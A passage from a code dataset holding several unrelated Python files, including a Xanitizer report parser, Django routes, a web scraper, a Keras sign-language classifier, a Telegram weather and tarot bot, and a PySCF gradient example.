coco.showAnns(anns)","sub_path":"PythonAPI/cocodata.py","file_name":"cocodata.py","file_ext":"py","file_size_in_byte":6927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"537590797","text":"import lxml.etree as xml\nfrom api.utils import write_results\nfrom django.utils import timezone\n\ndef parse_xanitizer(xml_file,user_name,init_es):\n\ttry:\n\t\tdata = xml.parse(xml_file) \n\texcept (xml.XMLSyntaxError,xml.ParserError):\n\t\traise MalFormedXMLException(user_name)\n\tdata = data.getroot()\n\tpath = data.xpath(r'//XanitizerFindingsList')\n\tprint(\"xanitizer parsing initiated\")\n\tfor main in path :\n\t\tfor finding in main.findall('finding'):\n\t\t\tproblemType = finding.findtext(\"problemType\")\n\t\t\trating = finding.findtext(\"rating\")\n\t\t\tresult_rating = int(float(rating))\n\t\t\ttry:\n\t\t\t\tcwehead,cweNumber = finding.findtext(\"cweNumber\").split('-')\n\t\t\texcept:\n\t\t\t\tcweNumber=0\n\t\t\tdescription = finding.findtext(\"description\")\n\t\t\tstartNode = finding.findtext(\"startNode\")\n\t\t\tnode = finding.findall(\"node\")\n\t\t\tstart_node =finding.findall(\"startNode\")\n\t\t\tclassification = finding.findtext(\"classification\")\n\t\t\tseverity ={}\n\t\t\tif classification == 'Must Fix':\n\t\t\t\tseverity['HIGH'] = 3\n\t\t\t\tseverity_name = 'HIGH'\n\t\t\telif classification == 'Warning':\n\t\t\t\tseverity['Medium'] =2\n\t\t\t\tseverity_name = 'Medium'\n\t\t\telif classification == 'Information':\n\t\t\t\tseverity['Low'] =1\n\t\t\t\tseverity_name = 'Low'\n\t\t\telif classification == 'Harmless':\n\t\t\t\tseverity['Info'] =0\n\t\t\t\tseverity_name = 'Info'\n\t\t\tfor startNode in start_node:\n\t\t\t\tkeys = startNode.keys()\n\t\t\t\tevids=[]\n\t\t\t\tfor items, key in enumerate(keys):\n\t\t\t\t\tif key == \"absolutePath\" :\n\t\t\t\t\t\tabsolutePath = startNode.values()[items]\n\t\t\t\t\t\tevids.append({\"url\":absolutePath})\n\n\t\t\tfor dictnode in node:\n\t\t\t\tkeys = dictnode.keys()\n\t\t\t\tevids=[]\n\t\t\t\tfor items, key in enumerate(keys):\n\t\t\t\t\tif key == \"absolutePath\" :\n\t\t\t\t\t\tabsolutePath = dictnode.values()[items]\n\t\t\t\t\t\tevids.append({\"url\":absolutePath})\n\n\t\t\tvul_dict = init_es\n\t\t\tvul_dict['vulnerability'] = {\n\t\t\t\t'name': problemType,\n\t\t\t\t'is_false_positive':False,\n\t\t\t\t'is_remediated':False,\n\t\t\t\t'is_deleted':False,\n\t\t\t\t'tool':'xanitizer',\n\t\t\t\t'confidence':result_rating,\n\t\t\t\t'severity':severity.get(severity_name),\n\t\t\t\t'description': description,\n\t\t\t\t'vul_type':'Insecure Coding',\n\t\t\t\t'remediation':'',\n\t\t\t\t'created_on':timezone.now().strftime(\"%Y-%m-%d %H:%M:%S\"),\n\t\t\t}\n\t\t\tvul_dict['vulnerability']['evidences'] = evids\n\t\t\tvul_dict['vulnerability']['cwe'] = {\n\t\t\t\t\t\t'cwe_id':cweNumber,\n\t\t\t\t\t\t'cwe_link':'https://cwe.mitre.org/data/definitions/%s.html'%cweNumber\n\t\t\t\t\t}\t\t\n\n\t\t\twrite_results(vul_dict)\n\tprint(\"xanitizer parsing completed\")\n\n","sub_path":"orchestron-community-api/orchy_project/parsers/xanitizer.py","file_name":"xanitizer.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"67665246","text":"from django.urls import include, path\nfrom rest_framework import routers\nfrom rest_framework_simplejwt.views import TokenObtainPairView, TokenRefreshView, TokenVerifyView\n\nfrom . import views\n\nrouter = routers.DefaultRouter()\nrouter.register(r'post', views.PostViewSet)\nrouter.register(r'comment', views.CommentViewSet)\n\nurlpatterns = [\n path('', include(router.urls)),\n path(\n 'jwt/', include([\n path('token/', TokenObtainPairView.as_view(), name='token_obtain_pair'),\n path('refresh/', TokenRefreshView.as_view(), name='token_refresh'),\n path('verify/', TokenVerifyView.as_view(), name='token_verify'),\n ])),\n]","sub_path":"WebApplication/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"367997300","text":"import os\nfrom shutil import copy\n\n\ndef fibonacci(n):\n # 0th and 1st term\n nums = [0, 1]\n # Start from the 2nd term to the nth term\n for i in range(2, n + 1):\n nums.append(nums[i - 2] + nums[i - 1])\n print(nums)\n\n\ndef fizzbuzz(n):\n # Store our values\n nums = []\n for i in range(1, n + 1):\n val = str(i)\n if i % 3 == 0 and i % 5 == 0:\n val = 'fizzBuzz'\n elif i % 3 == 0 or i % 5 == 0:\n val = 'fizz'\n nums.append(val)\n print(nums)\n\n\ndef saveFile(path):\n # The location of our data directory. Will be something like C:\\Users\\drale\\Documents\\example_directory\\example_package\\data\n saveLoc = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data')\n # Get the file name of the passed path.\n _, fileName = os.path.split(path)\n\n # Get the new save location. Will be something like C:\\Users\\drale\\Documents\\example_directory\\example_package\\data\\example.csv\n print(path)\n print(saveLoc)\n # Copy the file over\n copy(path, saveLoc)\n print('Saved!')\n\n\ndef printFiles():\n # The location of our data directory. Will be something like C:\\Users\\drale\\Documents\\example_directory\\example_package\\data\n saveLoc = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data')\n print(saveLoc)\n for file in os.listdir(saveLoc):\n # print each file\n print(file)\n","sub_path":"uploading-projects-to-pip/example_directory/build/lib/example_package/modules.py","file_name":"modules.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"647383654","text":"import pandas as pd\nimport requests\nfrom bs4 import BeautifulSoup\nfrom time import sleep\n\nano_counter = 0\n\nfor ano in range(7):\n\n anoTabela = str(ano_counter+2012) + \"/serie-a/\"\n link = \"https://www.tabeladobrasileirao.net/\" + str(anoTabela)\n\n print(link)\n\n try:\n req = requests.get(link)\n except:\n if req.status_code != 200:\n print('Requisição falhou!!!')\n content = req.content\n else:\n\n if req.status_code == 200:\n print('Requisição ok!!!')\n content = req.content\n\n soup = BeautifulSoup(content, 'html.parser')\n table = soup.findAll('div')\n\n table_str = str(table)\n jogos = pd.read_html(table_str)[0]\n classificacao = pd.read_html(table_str)[1]\n\n anoStr = ano_counter + 2012\n classificacaoSave = \"tabela\" + str(anoStr) + \".csv\"\n jogosSave = \"jogos\" + str(anoStr) + \".csv\"\n\n classificacao.to_csv(classificacaoSave)\n jogos.to_csv(jogosSave)\n\n ano_counter += 1\n\n print( \"processso \" + str(anoStr) + \" ok!!!\")\n\n sleep(5)\n","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"286429369","text":"\"\"\"\r\nThis code use LeNet-5 Structure to train Sign Language models\r\n@author: Bowen Song\r\n\"\"\"\r\n\r\nimport numpy as np \r\nimport pandas as pd \r\nimport matplotlib.pyplot as plt\r\nimport keras\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense, Conv2D , MaxPool2D , Flatten , Dropout , BatchNormalization\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.metrics import classification_report,confusion_matrix\r\nfrom keras.callbacks import ReduceLROnPlateau\r\n\r\n# Input data files from directory\r\nimport os\r\nfor dirname, _, filenames in os.walk('C:/Users/Administrator/Downloads/Data'):\r\n for filename in filenames:\r\n print(os.path.join(dirname, filename))\r\n\r\n# Loading the ASL dataset \r\ntrain_df = pd.read_csv(\"C:/Users/Administrator/Downloads/Data/sign_mnist_train/sign_mnist_train.csv\")\r\ntest_df = pd.read_csv(\"C:/Users/Administrator/Downloads/Data/sign_mnist_test/sign_mnist_test.csv\")\r\n\r\n# get training labels\r\n# remove label column from data and get the remaining data\r\ny_train = train_df['label']\r\ny_test = test_df['label']\r\ndel train_df['label']\r\ndel test_df['label']\r\nx_train = train_df.values\r\nx_test = test_df.values\r\n\r\n# Labels to OneHot\r\nfrom sklearn.preprocessing import LabelBinarizer\r\nlabel_binarizer = LabelBinarizer()\r\ny_train = label_binarizer.fit_transform(y_train)\r\ny_test = label_binarizer.fit_transform(y_test)\r\n\r\n# Normalize the data\r\nx_train = x_train / 255\r\nx_test = x_test / 255\r\n\r\n# Reshaping the data to feed into CNN\r\nx_train = x_train.reshape(-1,28,28,1)\r\nx_test = x_test.reshape(-1,28,28,1)\r\n\r\n# data augmentation\r\ndatagen = ImageDataGenerator(\r\n featurewise_center=False, # set input mean to 0 over the dataset\r\n samplewise_center=False, # set each sample mean to 0\r\n featurewise_std_normalization=False, # divide inputs by std of the dataset\r\n samplewise_std_normalization=False, # divide each input by its std\r\n zca_whitening=False, # apply ZCA whitening\r\n rotation_range=10, # randomly rotate images in the range (degrees, 0 to 180)\r\n zoom_range = 0.1, # Randomly zoom image \r\n width_shift_range=0.1, # randomly shift images horizontally (fraction of total width)\r\n height_shift_range=0.1, # randomly shift images vertically (fraction of total height)\r\n horizontal_flip=False, # randomly flip images\r\n vertical_flip=False) # randomly flip images\r\n\r\ndatagen.fit(x_train)\r\n\r\n# LeNet-5 Model\r\nmodel = Sequential()\r\nmodel.add(Conv2D(6 , (3,3) , strides = 1 , padding = 'same' , activation = 'relu' , input_shape = (28,28,1)))\r\nmodel.add(BatchNormalization())\r\nmodel.add(MaxPool2D((2,2) , strides = 2 , padding = 'same'))\r\nmodel.add(Conv2D(16 , (3,3) , strides = 1 , padding = 'same' , activation = 'relu'))\r\nmodel.add(Dropout(0.2))\r\nmodel.add(BatchNormalization())\r\nmodel.add(MaxPool2D((2,2) , strides = 2 , padding = 'same'))\r\nmodel.add(Conv2D(120 , (3,3) , strides = 1 , padding = 'same' , activation = 'relu'))\r\nmodel.add(BatchNormalization())\r\nmodel.add(MaxPool2D((2,2) , strides = 2 , padding = 'same'))\r\nmodel.add(Flatten())\r\nmodel.add(Dense(units = 512 , activation = 'relu'))\r\nmodel.add(Dropout(0.3))\r\nmodel.add(Dense(units = 24 , activation = 'softmax'))\r\nmodel.compile(optimizer = 'adam' , loss = 'categorical_crossentropy' , metrics = ['accuracy'])\r\nmodel.summary()\r\n\r\n# checkpoint\r\nfilepath=\"LeNet-5-weights-improvement-{epoch:02d}-{val_loss:.2f}.hdf5\"\r\ncheckpoint = keras.callbacks.ModelCheckpoint(filepath, monitor='val_loss', verbose=1, save_best_only=True,\r\n mode='min')\r\ncallbacks_list = [checkpoint]\r\nhistory = model.fit(datagen.flow(x_train,y_train, batch_size = 128) ,epochs = 50 , \\\r\n validation_data = (x_test, y_test) , callbacks=callbacks_list)\r\n\r\n# list all data in history\r\nprint(history.history.keys())\r\n# summarize history for accuracy\r\nplt.plot(history.history['accuracy'])\r\nplt.plot(history.history['val_accuracy'])\r\nplt.title('model accuracy')\r\nplt.ylabel('accuracy')\r\nplt.xlabel('epoch')\r\nplt.legend(['train', 'test'], loc='upper left')\r\nplt.show()\r\n# summarize history for loss\r\nplt.plot(history.history['loss'])\r\nplt.plot(history.history['val_loss'])\r\nplt.title('model loss')\r\nplt.ylabel('loss')\r\nplt.xlabel('epoch')\r\nplt.legend(['train', 'test'], loc='upper left')\r\nplt.show()\r\n\r\ntest_loss, test_accuracy = model.evaluate(x_test, y_test)\r\n\r\nprint('Test accuracy: {:2.2f}%'.format(test_accuracy*100))\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"code/model/LeNet5_Model.py","file_name":"LeNet5_Model.py","file_ext":"py","file_size_in_byte":4535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"197775892","text":"import matplotlib.pyplot as plt\nfrom cycler import cycler\nimport matplotlib as mpl\n\n\ndef cm2inch(*tupl):\n inch = 2.54\n if isinstance(tupl[0], tuple):\n return tuple(i / inch for i in tupl[0])\n else:\n return tuple(i / inch for i in tupl)\n\n\ndef style_cmyk():\n # https://matplotlib.org/tutorials/introductory/customizing.html\n plt.rcParams[\"font.family\"] = \"Arial\"\n # plt.rcParams['mathtext.default'] = 'regular'\n plt.rcParams['font.size'] = 8\n plt.rcParams['axes.autolimit_mode'] = 'data' # 'round_numbers' to eliminate axis margin\n plt.rcParams['axes.spines.top'] = False\n plt.rcParams['axes.spines.right'] = False\n plt.rcParams['legend.frameon'] = False\n plt.rcParams['figure.frameon'] = False\n plt.rcParams['figure.figsize'] = 18 / 2.54, 12 / 2.54\n mpl.rcParams['axes.prop_cycle'] = cycler(color=['#00A8E8', '#E62A88', '#FFBC1F', 'k', '#AD343E'])\n\n\ndef style_savefig():\n plt.rcParams['savefig.format'] = 'svg' # also eps for vector\n # plt.rcParams['savefig.dpi'] = 300\n\n\ndef example_plot():\n style_cmyk()\n\n fig = plt.figure()\n ax1 = fig.add_subplot(111)\n\n # ax1.set_title(\"This is my title\")\n ax1.set_xlabel('X-axis')\n ax1.set_ylabel('Y-axis')\n ax1.plot([0, 1], [0, 1], label='test1')\n ax1.plot([1, 2], [3, 4], label='test1')\n ax1.plot([0, 1], [1, 3], label='test1')\n ax1.plot([1, 2], [1, 4], label='test1')\n txt = 'Figure 1. I need the caption to be present a little below X-axis'\n plt.figtext(0.5, 0.03, txt, wrap=True, horizontalalignment='center', fontsize=10)\n plt.subplots_adjust(top=0.95, bottom=0.15)\n ax1.legend()\n plt.show()\n\n\ndef example_subplots():\n fig = plt.figure()\n for i, label in enumerate(('A', 'B', 'C', 'D')):\n ax = fig.add_subplot(2, 2, i + 1)\n ax.text(0.05, 0.95, label, transform=ax.transAxes,\n fontsize=16, fontweight='bold', va='top')\n plt.show()\n","sub_path":"plot_style.py","file_name":"plot_style.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"435168779","text":"from django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.feed, name='feed'),\n url(r'^profile/(?P\\d+)', views.profile, name='profile'),\n url(r'^create_post', views.post, name='create_post'),\n url(r'^delete/(?P\\d+)', views.delete, name='delete'),\n url(r'^api$', views.api, name='api'),\n url(r'^api/posts/$', views.PostList.as_view()),\n url(r'^api/profiles/$', views.ProfileList.as_view()),\n url(r'^api/posts/(?P\\d+)/$', views.IndividualPost.as_view()),\n]\n","sub_path":"Feed/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"48156081","text":"import logging\n\nfrom telegram import Update, KeyboardButton, ReplyKeyboardMarkup, ReplyKeyboardRemove\nfrom telegram.ext import MessageHandler, Filters, CommandHandler, CallbackContext\nfrom telegram.files.inputmedia import InputMediaPhoto\n\nfrom app import dice\nfrom app.ext_apis.dxy_open_data import load_ncov_data\nfrom app.ext_apis import csse_covid_19_data\nfrom app.ext_apis.tw_open_data import epa_aqi_api, uv_api\nfrom app.ext_apis.util import cartesian\nfrom app.ext_apis.util import reverse_geocode_customize\nfrom app.sqlite_utils.user_location import check_or_create_table_tg_user_location, insert_tg_user_location\nfrom app.sqlite_utils.user_location import query_tg_user_location\n\n\ndef get_function_keyboard_markup(chat_type):\n weather_button = KeyboardButton(text='\\U00002603 天氣')\n tarot_button = KeyboardButton(text='\\U0001F0CF 塔羅')\n fortune_button = KeyboardButton(text='\\U0001F3B0 運勢')\n ncov_button = KeyboardButton(text='\\U0001F637 武漢肺炎')\n ncov_new_button = KeyboardButton(text='\\U0001F637 武漢肺炎(CSSE)')\n touch_schumi_button = KeyboardButton(text='\\U0001F430 摸朽咪')\n feedback_button = KeyboardButton(text='\\U0001F4E8 建議交流')\n # “private”, “group”, “supergroup” or “channel”\n if chat_type != 'private':\n set_location_button = KeyboardButton(text='\\U0001F4CD 設定位置')\n else:\n set_location_button = KeyboardButton(text='\\U0001F4CD 設定位置', request_location=True)\n close_button = KeyboardButton(text='\\U0000274E 關閉鍵盤')\n custom_keyboard = [\n [weather_button, tarot_button, fortune_button],\n [ncov_button, ncov_new_button, touch_schumi_button],\n [feedback_button, set_location_button, close_button]\n ]\n markup = ReplyKeyboardMarkup(\n custom_keyboard,\n resize_keyboard=True,\n one_time_keyboard=True,\n selective=True,\n )\n return markup\n\n\ndef bot_help(update: Update, _context: CallbackContext):\n # _args = context.args\n update.message.reply_text(\n text=f'你可以:\\n'\n f'輸入 \"/\" 展開指令選單\\n'\n f'使用貼圖旁邊的 [ / ] 按鈕展開指令選單\\n'\n f'使用下面的鍵盤選單',\n reply_markup=get_function_keyboard_markup(update.message.chat.type)\n )\n\n\ndef get_ncov_keyboard_markup():\n korea_button = KeyboardButton(text='\\U0001F1F0\\U0001F1F7 韓國')\n japan_button = KeyboardButton(text='\\U0001F1EF\\U0001F1F5 日本')\n italy_button = KeyboardButton(text='\\U0001F1EE\\U0001F1F9 義大利')\n iran_button = KeyboardButton(text='\\U0001F1EE\\U0001F1F7 伊朗')\n reject_button = KeyboardButton(text='\\U0000274E 關閉鍵盤')\n custom_keyboard = [\n [korea_button, japan_button, italy_button, iran_button],\n [reject_button]\n ]\n markup = ReplyKeyboardMarkup(\n custom_keyboard,\n resize_keyboard=True,\n one_time_keyboard=True,\n selective=True,\n )\n return markup\n\n\ndef get_location_keyboard_markup():\n location_button = KeyboardButton(text='我要提供位置資訊', request_location=True)\n reject_button = KeyboardButton(text='\\U0000274E 關閉鍵盤')\n custom_keyboard = [[location_button, reject_button]]\n markup = ReplyKeyboardMarkup(\n custom_keyboard,\n resize_keyboard=True,\n one_time_keyboard=True,\n selective=True,\n )\n return markup\n\n\ndef get_weather_data_from_closest_site(lat, lon, json_data, site_tree):\n \"\"\"\n use K-D tree to find closet place\n ref: https://www.timvink.nl/closest-coordinates/\n :param lat:\n :param lon:\n :param json_data:\n :param site_tree:\n :return:\n \"\"\"\n cartesian_coord = cartesian(lat, lon)\n closest_site = site_tree.query([cartesian_coord], p=2)\n site_index = closest_site[1][0]\n return json_data[site_index]\n\n\ndef weather(update: Update, _context: CallbackContext):\n # _args = context.args\n gps_location = query_tg_user_location(update.effective_user.id)\n if not gps_location:\n if update.message.chat.type == 'private':\n reply = '朽咪不知道您的位置資訊,你想提供位置資訊讓朽咪提供更多服務嗎?'\n logging.getLogger(__name__).info(f'reply: {reply}')\n update.message.reply_text(\n text=reply,\n reply_markup=get_location_keyboard_markup()\n )\n else:\n reply = '朽咪不知道您的位置資訊,請點擊 @oripyon_bot 打開對話以提供位置'\n logging.getLogger(__name__).info(f'reply: {reply}')\n update.message.reply_text(\n text=reply\n )\n else:\n lat, lon = gps_location\n update.message.reply_text(text='自動取用離你最近的測站天氣資料中,目前僅限台灣國內才能正常使用', disable_notification=True)\n # update.message.reply_text(text='取得環保署即時空品資料中...', disable_notification=True)\n aqi_json_data, aqi_site_tree = epa_aqi_api()\n aqi_info = get_weather_data_from_closest_site(lat, lon, aqi_json_data, aqi_site_tree)\n aqi_site_name = aqi_info['SiteName']\n aqi_site_county = aqi_info['County']\n aqi = aqi_info['AQI']\n aqi_status = aqi_info['Status']\n pm25 = aqi_info['PM2.5']\n aqi_publish_time = aqi_info['PublishTime']\n # update.message.reply_text(text='取得環保署即時紫外線資料中...', disable_notification=True)\n uv_json_data, uv_site_tree = uv_api()\n uv_info = get_weather_data_from_closest_site(lat, lon, uv_json_data, uv_site_tree)\n uv_site_name = uv_info['SiteName']\n uv_site_county = uv_info['County']\n uvi = uv_info['UVI']\n uv_publish_time = uv_info['PublishTime']\n geo_info = reverse_geocode_customize((lat, lon))[0]\n update.message.reply_text(\n f'\\U0001F310 你所在的位置:{geo_info[\"name\"]} (行政區: {geo_info[\"admin1\"]}, 國家: {geo_info[\"cc\"]})\\n'\n f'離你最近的測站資訊:\\n'\n f'\\n'\n f'\\U0001F4A8 空品資訊從{aqi_site_name}測站 ({aqi_site_county})\\n'\n f'\\U000027A1 {aqi_status} (AQI: {aqi}, PM2.5: {pm25})\\n'\n f'\\U0000231A 時間: {aqi_publish_time}\\n'\n f'\\n'\n f'\\U0001F506 紫外線資訊從{uv_site_name}測站 ({uv_site_county})\\n'\n f'\\U000027A1 UVI: {uvi} \\n'\n f'\\U0000231A 時間: {uv_publish_time}\\n'\n )\n\n\ndef tarot(update: Update, _context: CallbackContext):\n # _args = context.args\n card = dice.draw_tarot()\n logging.getLogger(__name__).info(f'reply: {card}')\n update.message.reply_photo(\n photo=card['url'],\n caption=card['nameCN'],\n disable_notification=True,\n reply_to_message_id=update.message.message_id,\n )\n\n\ndef fortune(update: Update, _context: CallbackContext):\n # _args = context.args\n reply = dice.fortune(None, None)\n logging.getLogger(__name__).info(f'reply: {reply}')\n update.message.reply_text(reply)\n\n\ndef dummy_reply(update: Update, _context: CallbackContext):\n reply = '什麼事都沒發生,就跟你說別按齁 \\U0001F430'\n logging.getLogger(__name__).info(f'reply: {reply}')\n update.message.reply_text(reply)\n\n\ndef ncov_reply(update: Update, _context: CallbackContext):\n reply = '請選擇要查詢的災區國家 \\U0001F430'\n update.message.reply_text(\n text=reply,\n reply_markup=get_ncov_keyboard_markup()\n )\n\n\ndef query_ncov(update: Update, _context: CallbackContext, country):\n country_image_url = load_ncov_data()\n media_group = []\n for key in country_image_url:\n if key.startswith(country):\n media_group.append(InputMediaPhoto(media=country_image_url[key], caption=key))\n update.message.reply_media_group(\n media=media_group,\n disable_notification=True,\n )\n\n\ndef query_ncov_csse(update: Update, _context: CallbackContext, country):\n country_state_result, country_result = csse_covid_19_data.load_ncov_data()\n if country not in country_result:\n reply = '查無此國家'\n else:\n reply = [data[0].strftime('%Y-%m-%d') + ': ' + str(data[1]) + ', ' for data in country_result[country]]\n update.message.reply_test(\n text=reply,\n disable_notification=True,\n )\n\n\ndef touch_schumi(update: Update, _context: CallbackContext):\n reply = dice.touch_schumi()\n logging.getLogger(__name__).info(f'reply: {reply}')\n update.message.reply_text(reply)\n\n\ndef feedback(update: Update, _context: CallbackContext):\n reply = f'聯絡作者 @leafwind_tw\\n' \\\n f'朽咪公開聊天區 @oripyon_talk'\n update.message.reply_text(reply)\n\n\n# from Code snippets\n# https://github.com/python-telegram-bot/python-telegram-bot/wiki/Code-snippets#requesting-location-and-contact-from-user\ndef set_location(update: Update, _context: CallbackContext):\n if update.message.chat.type == 'private':\n reply = '你想提供位置資訊讓朽咪提供更多服務嗎?'\n logging.getLogger(__name__).info(f'reply: {reply}')\n update.message.reply_text(\n text=reply,\n reply_markup=get_location_keyboard_markup()\n )\n else:\n reply = '抱歉,位置只支援私訊朽咪 @oripyon_bot 提供'\n logging.getLogger(__name__).info(f'reply: {reply}')\n update.message.reply_text(\n text=reply\n )\n\n\ndef close_keyboard(update: Update, _context: CallbackContext):\n reply = 'OK!\\U0001F430'\n logging.getLogger(__name__).info(f'reply: {reply}')\n update.message.reply_text(reply, reply_markup=ReplyKeyboardRemove())\n\n\ndef make_reply(update: Update, _context: CallbackContext):\n # _args = context.args\n if not update.message.text:\n logging.warning(f'no text attribute in: {update.message}')\n text = update.message.text\n logger = logging.getLogger(__name__)\n if text == '\\U00002603 天氣':\n weather(update, _context)\n elif text == '\\U0001F0CF 塔羅':\n tarot(update, _context)\n elif text == '\\U0001F3B0 運勢':\n fortune(update, _context)\n elif text == '\\U0001F637 武漢肺炎':\n ncov_reply(update, _context)\n elif text == '\\U0001F637 武漢肺炎(CSSE)':\n query_ncov_csse()\n elif text == '\\U0001F430 摸朽咪':\n touch_schumi(update, _context)\n elif text == '\\U0001F4E8 建議交流':\n feedback(update, _context)\n elif text == '\\U0001F4CD 設定位置':\n set_location(update, _context)\n elif text == '\\U0000274E 關閉鍵盤':\n close_keyboard(update, _context)\n elif text == '\\U0001F1F0\\U0001F1F7 韓國':\n query_ncov(update, _context, 'korea')\n elif text == '\\U0001F1EF\\U0001F1F5 日本':\n query_ncov(update, _context, 'japan')\n elif text == '\\U0001F1EE\\U0001F1F9 義大利':\n query_ncov(update, _context, 'italy')\n elif text == '\\U0001F1EE\\U0001F1F7 伊朗':\n query_ncov(update, _context, 'iran')\n elif 'ㄆㄆ' in text:\n reply = '我知道!戳!\\U0001F430'\n logger.info(f'reply: {reply}')\n update.message.reply_text(reply)\n elif '我看了' in text:\n update.message.reply_sticker(\n sticker='CAACAgUAAxkBAAMrXlNbUucnbiBebclIoM_qSMb52-sAAjoBAALvY54jySoLvI3DgmEYBA',\n disable_notification=True,\n reply_to_message_id=update.message.message_id,\n )\n elif '沒事了' in text:\n reply = '沒事就好\\U0001F430'\n logger.info(f'reply: {reply}')\n update.message.reply_text(reply)\n\n\ndef receive_location(update: Update, _context: CallbackContext):\n location = update.message.location\n lat = location.latitude\n lon = location.longitude\n user = update.effective_user\n update.message.reply_text(\n f'您的資訊將會被朽咪記住,天氣預測功能將根據以下這些資訊提供服務:\\n'\n f'\\U0001F194 {user.id}\\n'\n f'\\U00003294 first name: {user.first_name}\\n'\n f'\\U0001F464 username: {user.username}\\n'\n f'\\U0001F310 經緯度: {lat}, {lon}'\n )\n check_or_create_table_tg_user_location()\n insert_tg_user_location(user.id, user.first_name, user.username, lat, lon)\n\n\ndef receive_sticker(update: Update, _context: CallbackContext):\n logger = logging.getLogger(__name__)\n logger.info(f'sticker file_id: {update.message.sticker.file_id}')\n\n\ndef add_handlers(dispatcher):\n dispatcher.add_handler(CommandHandler(\"help\", bot_help, pass_args=True))\n dispatcher.add_handler(CommandHandler(\"weather\", weather, pass_args=True))\n # dispatcher.add_handler(CommandHandler(\"tarot\", tarot, pass_args=True))\n # dispatcher.add_handler(CommandHandler(\"fortune\", fortune, pass_args=True))\n dispatcher.add_handler(CommandHandler(\"setlocation\", set_location, pass_args=True))\n dispatcher.add_handler(MessageHandler(Filters.text, make_reply))\n dispatcher.add_handler(MessageHandler(Filters.location, receive_location))\n dispatcher.add_handler(MessageHandler(Filters.sticker, receive_sticker))\n","sub_path":"bot_handler/tg.py","file_name":"tg.py","file_ext":"py","file_size_in_byte":13087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"39438809","text":"#!/usr/bin/env python\n#\n# Author: Qiming Sun \n#\n\n'''\nThe object returned by mf.nuc_grad_method() can be used to compute analytical\nnuclear gradients.\n'''\n\nfrom pyscf import gto, scf\n\nmol = gto.M(\n atom = [\n ['O' , 0. , 0. , 0],\n ['H' , 0. , -0.757 , 0.587],\n ['H' , 0. , 0.757 , 0.587]],\n basis = '631g')\n\nmf = scf.RHF(mol)\nmf.kernel()\ngrad = mf.nuc_grad_method()\ngrad.kernel()\n\nmf = scf.UHF(mol).x2c()\nmf.kernel()\ngrad = mf.nuc_grad_method()\ngrad.kernel()\n","sub_path":"examples/grad/01-scf_grad.py","file_name":"01-scf_grad.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"172388013","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# 가로수 \n# https://www.acmicpc.net/problem/2485\n\n# 가능한 모든 가로수의 경우의 수를 확인하여 비교 \n\nimport sys\n\nif __name__ == '__main__':\n num = int(sys.stdin.readline().strip())\n inputData = []\n for cnt in range(num):\n inputData.append(int(sys.stdin.readline().strip()))\n\n #print(inputData)\n #inputData = sorted(inputData)\n max = max(inputData)\n min = min(inputData)\n size = max - min + 1\n\n inputData_init = [x-min for x in inputData]\n #print(inputData_init)\n\n check_init = [0]*(size)\n #print(check_init)\n for data in inputData_init:\n check_init[data] = 1\n\n #print(check_init)\n\n #1\n result = {}\n for k in range(1, size):\n compare_arr = [0]*(size)\n compare_arr[0] = 1\n for cnt in range(1, size):\n if cnt % k == 0:\n compare_arr[cnt] = 1\n check = []\n for p in range(size):\n if check_init[p] == 1 and compare_arr[p] == 1:\n check.append(p)\n if check == inputData_init:\n result[k] = compare_arr.count(1) - num\n #print(result)\n\n a = sorted(result, key=lambda x:result[x])\n print(result[a[0]])\n\n\n\n\n\n","sub_path":"BaekjoonOnlineJudge/acmicpc_2485_Fail.py","file_name":"acmicpc_2485_Fail.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"571134507","text":"import multiprocessing\nimport gevent\nimport gevent.monkey\nfrom gevent.pool import Pool\nfrom copy_state_db import CopyStateDB\nfrom faster_ordered_dict import FasterOrderedDict\nfrom pymongo import ReadPreference\nimport utils\nimport logging\nimport datetime\nimport time\nimport os\nimport sys\n\nlog = utils.get_logger(__name__)\n\n\nclass Stats(object):\n def __init__(self):\n self.start_time = self.adj_start_time = time.time()\n self.inserted = 0\n self.batch = 0\n self.total_docs = None\n self.duplicates = 0 # not a true count of duplicates; just an exception count\n self.exceptions = 0\n self.retries = 0\n\n def log(self, adjusted=False):\n start_time = self.adj_start_time if adjusted else self.start_time\n total = self.total_docs\n if total == 0:\n total = 1\n qps = int(float(self.inserted) / (time.time() - start_time))\n pct = int(float(self.inserted)/total*100.0)\n text = (\"%d%% | %d / %d adjusted | %d/sec | %d dupes | %d exceptions | %d retries\" %\n (pct, self.inserted, self.total_docs, qps, self.duplicates,\n self.exceptions, self.retries))\n\n log.debug(text)\n sys.stdout.write(\"\\r\"+text)\n sys.stdout.flush()\n\n\ndef _ttl_stats_worker(stats):\n while True:\n stats.log()\n 